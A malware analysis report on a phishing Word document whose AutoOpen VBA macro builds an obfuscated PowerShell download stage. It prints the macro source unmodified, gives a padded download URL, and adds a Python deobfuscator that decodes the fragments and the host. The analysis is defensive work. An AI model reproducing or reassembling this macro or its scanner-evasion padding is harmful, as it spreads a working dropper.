Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK: T1059.005 Command and Scripting Interpreter: Visual Basic; T1204.002 User Execution: Malicious File
The sample is a malicious Word document whose VBA project contains an AutoOpen procedure, so the macro runs as soon as the document is opened with macros enabled. AutoOpen sets `On Error Resume Next`, pads itself with arithmetic on undeclared variables (dead code whose only purpose is to change the file's appearance to signature scanners), and then calls `Application.Run` to invoke a second procedure by name, passing the return value of the function `LuQPFKHUKuJWn`. That function assembles strings with `Mid()` slices of longer junk-filled literals; the slices read as pieces of a PowerShell command line: `[CHAR]nn` character escapes, `-CrEplacE`/`-rePlACe` operators, `System.Net.WebClient`, and a `foreach(... in ...){try{` loop, i.e. a download stage. The heuristics also report a `Shell()` call in the VBA, the likely launcher for that command; it is not visible in the truncated preview below. The URL extracted from the document body carries the same `c3y+c3y` and `D4G+D4G` padding substrings that the macro's replace fragments refer to, so the literal string in the file is obfuscated and must be de-padded before it is used as an indicator. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' is consistent with a phishing-lure dropper.
Heuristics (7)

- ClamAV: Img.Dropper.PhishingLure-6443153-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): the document contains VBA macro code.
- Shell() call in VBA (critical, OLE_VBA_SHELL): the VBA source contains a Shell() call.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): the VBA project defines an AutoOpen procedure, which Word runs automatically when the document is opened.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents, or documents whose source extraction failed, where no visible source is available.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): the OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this heuristic's wording conflicts with the VBA project actually recovered from this sample (see the extracted artifacts); treat the marker as corroborating the OLE_VBA_AUTOOPEN finding rather than as an independent one.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; the per-URL labels say which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - https://c3y+c3ywww.blueyacD4G+D4GhtchartD4G+D4c3y+c3yGer.coD4G+D4Gm/c3y (in document text, OLE body). The `c3y+c3y` and `D4G+D4G` substrings are the same padding tokens that the macro's replace fragments reference; the string is not usable as an indicator until they are removed.
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace URI, not a network indicator.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 24155 bytes | b2aacc79f4f58cbcd8712be2d2491e5c9881442a1c7d4dfeb9674dee83d6e0fa |
Preview script (first 1,000 lines of the extracted script). olevba concatenates the modules it recovers, so the listing starts with the attribute block of the `ThisDocument` module followed by the attribute line of the `HVpFnmFF` module that holds AutoOpen. The sample is reproduced unmodified.

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "HVpFnmFF"
Sub AutoOpen()
On Error Resume Next
ITSEREIbU = jociVzYGDtRWLw - OBYkOqfCo / (4327992 + TflPnTZwjXXbZw - 3432356 + kQFlITqCCkr)
FFAmnHXjs = nFzwPPqraw - wPulikpAojND / (5464573 + qikjTBSZGw - 2012786 + osDAKclG)
JqGAFWifD = aBUdYhFIHwSX - wbavwwoY / (7108269 + WKAckdwTn - 4314882 + WInLUWvCUo)
Application.Run "wrTPYEmLACm", LuQPFKHUKuJWn
oljHZiblj = MpjwSXEVi - diAobSnk / (5509176 + sWQiiYTUKz - 4102829 + EHHjZotwRaXJ)
LJlsfGrqI = WqZEQtDk - fpuatjvt / (9707223 + jISwGTYnboEHi - 5047038 + kRHUXAshPsTQir)
End Sub
Function LuQPFKHUKuJWn()
On Error Resume Next
sSSljX = ZGNMHXmkwJQj - VzXdkHotKdm / (8097865 + TqzzVofVGiJi - 4190318 + EKLNZsvIDQ)
sRpQiZRQTE = NHTsPcb - aDvkzocEFO / (2782639 + uPjjiwQMz - 7142596 + mjvIjMcr)
NtEdSM = iLvUJaM - wnptpCIwYk / (2044628 + LOYpsJBDf - 9314745 + dXIfjUOZImrQK)
CRttwbip = rvJWqbXiAnjwPH + Mid(("IpPRiF hWGODR+[CHAR]78),[CHAR]39 -CrEplacE'AVT',[CHAR]36)) drFjNUXi"), 14, 47)
qBkrHCvL = YJtzvMWhWZiJKC - TzOuaLUPVoQ / (2260995 + NLvOmZjdwQOivQ - 1903187 + fwRPwaVYL)
XpYbzw = nEtXLfA - TKdPXkTAVh / (71529 + fvKBqpww - 75907 + qXDkmfkbEiiW)
DYHstiBYkIq = wkQahwwFoYzWst - hVhEYhUGLmwnQ / (8904430 + RcJzLQZOQAE - 6347379 + zDOtmst)
GjiDiVc = RzjnJIbRauTnFc + Mid(("rwSJUfiLBMlupXyNSBc3y+c3y + '+'65N+65bKuMwmUIwjNspnirmjZiqjwL"), 15, 23)
YOurhLhdO = GWMshbHG - DUASGIXEB / (4645320 + tQwLkhl - 4141917 + hsYVqsjBAEQ)
tnhbv = ckacOMXwQiGH - SpYBIAql / (6171024 + LvibObVDzHNR - 6176729 + iVVNZKDlRL)
ZcwoZT = DIAsEaAwCP - kkJUuaJzwBJA / (3540033 + icMVfaiTEKSV - 2222101 + hNVdIBllEEQcb)
UTLISFMZB = BizOiiEojIfL + Mid(("OfBtJdHzHMJvMHCbNhSOwnKfach(x2D4G+c3y+c3yD4G0asfc in D4G+D4G'+'x20ADCX){D4G+D4Gt'+'ryc3y+c3y{x2D4G+D4G0YYDWMnjBOpIuj"), 25, 82)
jGvPnz = WpCQjzBYPRS - jfsQBtYHFDwN / (957732 + QKmGSjYuHTzV - 963453 + CrMKwiq)
lwUnalqV = PREjZjVTq - LwiqmJwiKlYYR / (6190448 + TENqnOarBuVCm - 1974944 + YncKJGWLFDMQU)
NvbcmD = qrAXrGc - dDalHjwQ / (1306413 + YSMkwHWi - 9425800 + ImawGmLDViuEQ)
nnEGnkwn = OWuHiFZzo + Mid((" PsfGWjkRIHM[ChAR]70+[Chc3y+c3yAR]105+[ChAR]11665N+65N),'+'[ChAR]39c3y+c3y 65N+65N-CrepLaCE Dc3y+c3y4Ge5tD4G,['+'ChAR]965N+65N2 -rePlACeD4IhzSSzRuqdTBzjKvtHWZEtUoP"), 13, 128)
siLcdaTwj = sBsFvsA - JjzqccfV / (4173864 + vcSUBvaXXzjHc - 3770453 + aFEuFIcdkvjRU)
wCIcmERUOT = HsdTXtUiYzwfXV - aBGjABW / (5233407 + QjTwhYUiGbP - 1304258 + nFaVshEz)
UbwvbLtni = kGbKtakTul - BDnaVAzfR / (4861489 + GuTNBFiIoWdqwM - 4421879 + futmjdpEkR)
OqWCQw = KYkXwpPow + Mid(("TKH+D4Git) D4G+D4GSyst'+'em.Net.WeD4G+D4GbD4G+D4GCl65N+65Nient;x20NSD4'+'G+D4GBD'+'4G+D4G = x20nsadaczzbfSfGSzJ"), 4, 97)
lmMbdRBd = jrfZfpl - uYNoNwdUkYnPcF / (2855993 + jFiQGzzpKMq - 6131709 + VOzvjvjXdmBOOo)
cfXlGKmt = NZXbcCqZ - UqwaXiBI / (9585328 + PJpTvJiGFS - 5761478 + rJpckoO)
cDtKt = ziomaqw - zwksQtZ / (9657167 + FbRtvkHjSz - 7588201 + vtNtuXkVDsFK)
XhwZwRV = zsiZjAo + Mid(("MSOJovRbOpGfClivXfG65N+6'+'5NOxND4G,[ChAR]96 -c3Sqv"), 19, 31)
rinjwcFX = KBuhGIrLTEFXwW - odUMWGQpdZ / (8992658 + BDuqOAwjVqnw - 7067200 + zJBBKmPav)
NvhzI = jSqqtMQIL - pHZOqXCmBwp / (4670625 + HHGncPHRaIf - 1326203 + JFqIZfkJYrjnLm)
vNAjSvVr = cZwYLqjjnZot - JPztHtO / (9320885 + sYKnSiPWzQcXpA - 2249325 + vGZWCjkm)
pkkRTOTtYGB = GGhllzjrEiM + Mid(("WsqdYMUDAiRXnzsTvbQzzzJ"), 12, 1)
zuHYMNRb = XATQZXQjUP - mLmoatIoXHSZX / (6307626 + zEjJTntXj - 4826045 + mJMWAfu)
BfsdjfqbPPi = DUijNmY - qQEawjGYLwLv / (9954690 + oDPXHwbBGnfSd - 9682711 + VVWuECHiwF)
cCpQfh = DoKDUwE - jbTpiaIo / (1869923 + vdGIDpboB - 9106968 + jYRSFvmqDThOT)
wsmwIODnSPP = zJsqjRXojhXO + Mid(("fswzbCWbsFniuRSSKJ4U/uzLLsjuTNPwGSCJAwkK"), 19, 3)
sBmhFfN = cwulVbf - JTzCBXZiVzGzNP / (7569032 + JmvwizcjLOpJA - 302298 + bnlEzSrAHS)
izocd = aQrPpMIEbijjO - qQrniQiT / (5473702 + KcKnYSmodtY - 2332692 + vZdAvamvEXuIC)
ASRHq = NZCKHoM
... (truncated)
```
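To make the macro's string assembly concrete, the following Python is an added example written for this report; it is not code from the sample or from the analysis tool. It emulates VBA's `Mid()` (1-based start, clipped at the end of the string), deletes the padding tokens that recur in the fragments and in the embedded URL (`c3y+c3y`, `D4G+D4G`, `65N+65N`, and the PowerShell `'+'` string splice), and decodes `[CHAR]nn` escapes. Treating those substrings as pure padding is an assumption inferred from the `-CrEplacE`/`-rePlACe` fragments, not something the report states; the input strings are copied from the preview above, and every function and variable name is the example's own.

```python
import re

# Padding tokens observed in the extracted macro fragments and in the embedded
# URL of this report, plus the PowerShell '+' splice the obfuscator inserts
# between quoted pieces. Assumption: these substrings are pure padding that the
# script's own -replace operations remove before execution.
JUNK_TOKENS = ("'+'", "c3y+c3y", "D4G+D4G", "65N+65N")


def vba_mid(s: str, start: int, length: int) -> str:
    """Emulate VBA Mid(s, start, length): 1-based start, clipped at end of string."""
    if start < 1:
        raise ValueError("VBA Mid requires start >= 1")
    return s[start - 1:start - 1 + length]


def strip_junk(s: str) -> str:
    """Delete padding tokens until none remain.

    A fixed-point loop matters: the tokens nest in the sample (D4G+D4c3y+c3yG,
    65N+6'+'5N), so a single ordered pass would leave half-tokens behind.
    """
    prev = None
    while prev != s:
        prev = s
        for tok in JUNK_TOKENS:
            s = s.replace(tok, "")
    return s


_CHAR_RE = re.compile(r"\[char\](\d+)", re.IGNORECASE)


def decode_chars(s: str) -> str:
    """Turn PowerShell [CHAR]nn / [ChAR]nn escapes into the literal character."""
    return _CHAR_RE.sub(lambda m: chr(int(m.group(1))), s)


def deobfuscate(s: str) -> str:
    # Order matters: strip padding before decoding, otherwise '[ChAR]11665N+65N'
    # would be read as chr(11665) instead of chr(116) followed by padding.
    return decode_chars(strip_junk(s))


# Inputs copied from this report: the embedded URL and three Mid() calls from
# the macro preview (string literal, start, length exactly as written in VBA).
EMBEDDED_URL = "https://c3y+c3ywww.blueyacD4G+D4GhtchartD4G+D4c3y+c3yGer.coD4G+D4Gm/c3y"
MID_CALLS = [
    ("IpPRiF hWGODR+[CHAR]78),[CHAR]39 -CrEplacE'AVT',[CHAR]36)) drFjNUXi", 14, 47),
    ("OfBtJdHzHMJvMHCbNhSOwnKfach(x2D4G+c3y+c3yD4G0asfc in D4G+D4G'+'x20ADCX){D4G+D4Gt'+'ryc3y+c3y{x2D4G+D4G0YYDWMnjBOpIuj", 25, 82),
    ("TKH+D4Git) D4G+D4GSyst'+'em.Net.WeD4G+D4GbD4G+D4GCl65N+65Nient;x20NSD4'+'G+D4GBD'+'4G+D4G = x20nsadaczzbfSfGSzJ", 4, 97),
]


def decoded_fragments() -> list[str]:
    """Apply the macro's own Mid() slicing, then strip padding and decode escapes."""
    return [deobfuscate(vba_mid(s, start, length)) for s, start, length in MID_CALLS]


def decoded_url() -> str:
    """The embedded URL with the padding tokens deleted."""
    return strip_junk(EMBEDDED_URL)


if __name__ == "__main__":
    print("URL after padding removal:", decoded_url())
    for frag in decoded_fragments():
        print("fragment:", repr(frag))
```

Run stand-alone, the script prints the de-padded URL and the three decoded fragments. Deleting the tokens leaves `https://www.blueyachtcharter.com/c3y` (the trailing `c3y` is an unpaired token and is left alone), and the third fragment yields `System.Net.WebClient`, the .NET class the downloader stage would use. What stays unresolved here, such as `x20` and the `AVT` token that the first fragment's `-CrEplacE'AVT',[CHAR]36` turns into `$`, depends on parts of the script the preview does not show, so the host should be confirmed against the fully decoded command rather than taken from this partial reconstruction alone.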